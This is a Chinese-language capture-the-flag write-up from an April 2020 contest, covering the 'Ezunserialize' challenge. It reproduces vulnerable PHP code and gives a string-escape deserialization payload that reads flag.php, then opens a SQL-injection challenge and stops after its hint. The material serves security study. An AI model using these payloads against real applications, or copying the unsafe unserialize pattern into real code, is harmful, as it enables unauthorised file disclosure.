安恒月赛20200425

Ezunserialize

打开就有源码

 <?php
show_source("index.php");
function write($data) {
    return str_replace(chr(0) . '*' . chr(0), '\0\0\0', $data);
}

function read($data) {
    return str_replace('\0\0\0', chr(0) . '*' . chr(0), $data);
}

class A{
    public $username;
    public $password;
    function __construct($a, $b){
        $this->username = $a;
        $this->password = $b;
    }
}

class B{
    public $b = 'gqy';
    function __destruct(){
        $c = 'a'.$this->b;
        echo $c;
    }
}

class C{
    public $c;
    function __toString(){
        //flag.php
        echo file_get_contents($this->c);
        return 'nice';
    }
}

$a = new A($_GET['a'],$_GET['b']);
//省略了存储序列化数据的过程,下面是取出来并反序列化的操作
$b = unserialize(read(write(serialize($a))));

看见替换想到字符串逃逸

因为A类中的username，password可控。

<?php
class A{
    public $username;
    public $password;
    function __construct(){
        $this->password = new B();
        $this->username ='\0';
    }
}

class B{
    public $b;
    function __construct(){
        $this->b=new C;
    }
}

class C{
    public $c;
    function __construct(){
        $this->c="flag.php";
    }
}

$a=new A();
echo serialize($a); //O:1:"A":2:{s:8:"username";s:2:"\0";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"flag.php";}}}

在经过替换函数后，字符减少了3个。正常的序列化后的字符串是

function write($data) {
    return str_replace(chr(0) . '*' . chr(0), '\0\0\0', $data);
}

function read($data) {
    return str_replace('\0\0\0', chr(0) . '*' . chr(0), $data);
}

O:1:"A":2:{s:8:"username";s:4:"test";s:8:"password";s:4:"tese";}

要使得password的类型变成对象类，就要把原本的字符串类型吃掉。

O:1:"A":2:{s:8:"username";s:48:"********";s:8:"password";s:74:"0";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"flag.php";}}}";}

a=\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 (8个\0\0\0). b=0";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"flag.php";}}}

本地测试通过了，但是远程没打通

babytricks

打开题目是一个登录框，查看源码发现提示

tips:select * from user where user='$user' and passwd='%s'